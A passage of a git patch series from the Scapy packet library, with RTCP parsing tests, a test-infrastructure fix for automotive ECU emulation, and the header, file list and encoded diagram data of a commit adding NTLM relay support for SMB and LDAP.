b/test/contrib/rtcp.uts @@ -0,0 +1,78 @@ +# RTCP unit tests +# run with: +# test/run_tests -P "load_contrib('rtcp')" -t test/contrib/rtcp.uts -F + +% RTCP regression tests for Scapy + +############ +# RTCP +############ + ++ RTCP Sender Report tests + += test sender report parse + +raw = b'\x80\xc8\x00\x06\x9c\xe9\xc6\x48\xe5\x61\xe4\x4b\x63\x8a\x19\xc9\x98\x64\xea\x2e\x00\x00\x00\x49\x00\x00\x09\x69' +parsed = RTCP(raw) +assert parsed.version == 2 +assert parsed.padding == 0 +assert parsed.count == 0 +assert parsed.packet_type == 200 +assert parsed.length == 6 +assert parsed.sourcesync == 0x9ce9c648 +assert parsed.sender_info.ntp_timestamp == 0xe561e44b638a19c9 +assert parsed.sender_info.rtp_timestamp == 2556750382 +assert parsed.sender_info.sender_packet_count == 73 +assert parsed.sender_info.sender_octet_count == 2409 + ++ RTCP Receiver Report tests + += test receiver report parse + +raw = b'\x81\xc9\x00\x07\xa2\xdf\x02\x72\x49\x6e\x93\xbd\x00\xff\xff\xff\x00\x00\x59\x47\x00\x00\x00\x00\xe4\x8f\xb9\x3a\x00\x03\x3f\x1b' +parsed = RTCP(raw) +assert parsed.version == 2 +assert parsed.padding == 0 +assert parsed.count == 1 +assert parsed.packet_type == 201 +assert parsed.length == 7 +assert parsed.sourcesync == 0xa2df0272 +assert parsed.report_blocks[0].sourcesync == 0x496e93bd +assert parsed.report_blocks[0].fraction_lost == 0 +assert parsed.report_blocks[0].cumulative_lost == 0xffffff +assert parsed.report_blocks[0].highest_seqnum_recv == 22855 +assert parsed.report_blocks[0].interarrival_jitter == 0 +assert parsed.report_blocks[0].last_SR_timestamp == 0xe48fb93a +assert parsed.report_blocks[0].delay_since_last_SR == 212763 + ++ RTCP Source Description tests + += test source description report parse + +raw = b"\x81\xca\x00\x0c\xa2\xdf\x02\x72\x01\x1c\x75\x73\x65\x72\x31\x35" \ + b"\x30\x33\x34\x38\x38\x39\x30\x31\x40\x68\x6f\x73\x74\x2d\x65\x37" \ + b"\x32\x64\x62\x34\x33\x64\x06\x09\x47\x53\x74\x72\x65\x61\x6d\x65" \ + b"\x72\x00\x00\x00" +parsed = RTCP(raw) +assert parsed.version == 2 +assert parsed.padding == 0 +assert parsed.count == 1 +assert parsed.packet_type == 202 +assert parsed.length == 12 +assert parsed.sdes_chunks[0].sourcesync == 0xa2df0272 +assert parsed.sdes_chunks[0].items[0].chunk_type == 1 +assert parsed.sdes_chunks[0].items[0].length == 28 +assert parsed.sdes_chunks[0].items[0].value == b'user1503488901@host-e72db43d' +assert parsed.sdes_chunks[0].items[1].chunk_type == 6 +assert parsed.sdes_chunks[0].items[1].length == 9 +assert parsed.sdes_chunks[0].items[1].value == b'GStreamer' + ++ RTCP parsing tests + += test parse SR and SDES stacked +raw = b"\x81\xc9\x00\x07\xa2\xdf\x02\x72\x49\x6e\x93\xbd\x00\xff\xff\xff" \ + b"\x00\x00\x59\x47\x00\x00\x00\x00\xe4\x8f\xb9\x3a\x00\x03\x3f\x1b" \ + b"\x81\xca\x00\x0c\xa2\xdf\x02\x72\x01\x1c\x75\x73\x65\x72\x31\x35" \ + b"\x30\x33\x34\x38\x38\x39\x30\x31\x40\x68\x6f\x73\x74\x2d\x65\x37" \ + b"\x32\x64\x62\x34\x33\x64\x06\x09\x47\x53\x74\x72\x65\x61\x6d\x65" \ + b"\x72\x00\x00\x00" From 0fa591106a60bcac2fcf9f703a4d7eddbcd3bf00 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 1 Feb 2022 10:55:39 +0100 Subject: [PATCH 0729/1632] Win: fix appveyor tests (#3517) --- scapy/automaton.py | 2 +- scapy/contrib/automotive/ecu.py | 5 ----- test/contrib/automotive/ecu_am.uts | 2 -- test/contrib/automotive/gm/scanner.uts | 2 -- test/contrib/automotive/interface_mockup.py | 7 ------- test/contrib/automotive/obd/scanner.uts | 2 -- test/contrib/automotive/scanner/uds_scanner.uts | 2 -- test/tools/obdscanner.uts | 2 ++ 8 files changed, 3 insertions(+), 21 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index df487a96fd5..414984e1cc0 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -96,7 +96,7 @@ def select_objects(inputs, remain): results = results.union(set(select.select(natives, [], [], remain)[0])) if events: # 0xFFFFFFFF = INFINITE - remainms = int(remain * 1000 if remain else 0xFFFFFFFF) + remainms = int(remain * 1000 if remain is not None else 0xFFFFFFFF) if len(events) == 1: res = ctypes.windll.kernel32.WaitForSingleObject( ctypes.c_void_p(events[0].fileno()), diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 9fde1efa260..461fdcb6e42 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -22,7 +22,6 @@ from scapy.plist import PacketList from scapy.sessions import DefaultSession from scapy.ansmachine import AnsweringMachine -from scapy.config import conf from scapy.supersocket import SuperSocket from scapy.error import Scapy_Exception @@ -558,9 +557,6 @@ def command(self): __hash__ = None # type: ignore -conf.contribs['EcuAnsweringMachine'] = {'send_delay': 0} - - class EcuAnsweringMachine(AnsweringMachine[PacketList]): """AnsweringMachine which emulates the basic behaviour of a real world ECU. Provide a list of ``EcuResponse`` objects to configure the behaviour of a @@ -675,7 +671,6 @@ def send_reply(self, reply): :param reply: List of packets to be sent. """ for p in reply: - time.sleep(conf.contribs['EcuAnsweringMachine']['send_delay']) if len(reply) > 1: time.sleep(random.uniform(0.01, 0.5)) if self._main_socket: diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 9c73ca3f041..d2eea1e3aeb 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -17,8 +17,6 @@ load_contrib("automotive.uds", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) load_contrib("automotive.uds_ecu_states", globals_dict=globals()) -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0 - ecu = TestSocket(UDS) tester = TestSocket(UDS) ecu.pair(tester) diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 32b8c40c95b..0647fd0623f 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -27,8 +27,6 @@ load_layer("can") = Define Testfunction -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.0 - def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwargs): ecu = TestSocket(GMLAN) tester = TestSocket(GMLAN) diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 653b81368cf..96aaac19e1d 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -202,10 +202,3 @@ def exit_if_no_isotp_module(): else: if ISOTPSocket is not ISOTPSoftSocket: # type: ignore raise Scapy_Exception("Error in ISOTPSocket import!") - -# ############################################################################ -# """ Prepare send_delay on Ecu Answering Machine to stabilize unit tests """ -# ############################################################################ -from scapy.contrib.automotive.ecu import * # noqa: F403 -log_runtime.debug("Set send delay to lower utilization on CI machines") -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 2b54ad81bb8..eb634104e3c 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -14,8 +14,6 @@ load_contrib("automotive.obd.obd", globals_dict=globals()) load_contrib("automotive.obd.scanner", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0 - = Create sockets ecu = TestSocket(OBD) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 5d74fb431bd..f952567cda7 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -25,8 +25,6 @@ load_layer("can") = Define Testfunction -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.01 - def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstable_socket=True, **kwargs): TesterSocket = UnstableSocket if unstable_socket else TestSocket ecu = TestSocket(UDS) diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 4dfa467f3c2..ef21e9fba12 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -8,6 +8,8 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: exec(f.read()) +load_contrib("automotive.ecu", globals_dict=globals()) + + Usage tests = Test wrong usage From b1bb1aec679b4fbe66998061432665f27001468f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 3 Feb 2022 11:58:17 +0100 Subject: [PATCH 0730/1632] NTLM relaying - SMB / LDAP (#3485) * SMB relay * OPC_DA: use new NTLM * Rework of NTLM automatas * SMB2 implementation * LDAP client relay * Fix SMB1 share name * Document SMB2 IOCTL failure & add RUN_SCRIPT * Minor formatting fixes * Update NTLM doc * Support for LDAPS client * Improve NegoEX handling * SMB2 close request * Reverse engineer NEGOEX-NTLM metadata * Implement the two DROP-THE-MIC vulns --- doc/scapy/graphics/ntlm/ntlmrelay_ldap.png | Bin 0 -> 84711 bytes doc/scapy/graphics/ntlm/ntlmrelay_ldaps.png | Bin 0 -> 53781 bytes doc/scapy/graphics/ntlm/ntlmrelay_smb.png | Bin 0 -> 223325 bytes doc/scapy/graphics/ntlm/ntlmrelay_smb2.png | Bin 0 -> 240337 bytes .../graphics/ntlm/ntlmrelay_smb_win1.png | Bin 0 -> 64555 bytes .../graphics/ntlm/ntlmrelay_smb_win2.png | Bin 0 -> 60780 bytes .../graphics/ntlm/ntlmrelay_smb_wireshark.png | Bin 0 -> 302555 bytes doc/scapy/layers/index.rst | 4 + doc/scapy/layers/ntlm.rst | 128 +++ scapy/ansmachine.py | 86 +- scapy/asn1/asn1.py | 4 + scapy/automaton.py | 16 +- scapy/config.py | 1 + scapy/contrib/automotive/ecu.py | 4 +- scapy/contrib/dce_rpc.py | 16 +- scapy/contrib/opc_da.py | 67 +- scapy/fields.py | 113 +- scapy/layers/dhcp6.py | 2 - scapy/layers/gssapi.py | 249 ++++- scapy/layers/inet.py | 12 +- scapy/layers/l2.py | 4 +- scapy/layers/ldap.py | 87 ++ scapy/layers/ntlm.py | 385 ++++++- scapy/layers/smb.py | 979 ++++++++++++++++-- scapy/layers/smb2.py | 283 ++++- scapy/layers/tls/handshake.py | 3 + test/scapy/layers/netflow.uts | 2 +- test/scapy/layers/smb.uts | 23 +- test/scapy/layers/smb2.uts | 12 +- 29 files changed, 2199 insertions(+), 281 deletions(-) create mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_ldap.png create mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_ldaps.png create mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb.png create mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb2.png create mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb_win1.png create mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb_win2.png create mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb_wireshark.png create mode 100644 doc/scapy/layers/ntlm.rst diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_ldap.png b/doc/scapy/graphics/ntlm/ntlmrelay_ldap.png new file mode 100644 index 0000000000000000000000000000000000000000..ba410371db7d78fae8e8e7ffdcba34c4d40fbb38 GIT binary patch literal 84711 zcmagG1yogS*S5U~3F#1!Mv;~-Nd@T!>2B%nmXhu+=}Uh+op|SmH^ysH$1-Vdi`~WOFe4 zmK3DYYe^Zq=^+xqrSYoIc;GatCi<13M14*+#>6M94UCkG3G3x(cx5GBnSq)?guSRH z0e$;Vv7;q2O(SDFjx@wBCy9+$8ZUB{{q(8b&F%(yFC=9$I3vNU4LPZbD3io{YM#y- zOI*6@gJl>?h>tNdfE{B{+yZ>f}%22 zB#RpgmuV58Y8UwpM?MOlUmr-G*CYHi9Uv3l`%faS#l%((Lb=ed^AV`a&qJ7H}c4{VgJu`G

    tLGv*RrP@0|8&)qIf5~PnKkd$ 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 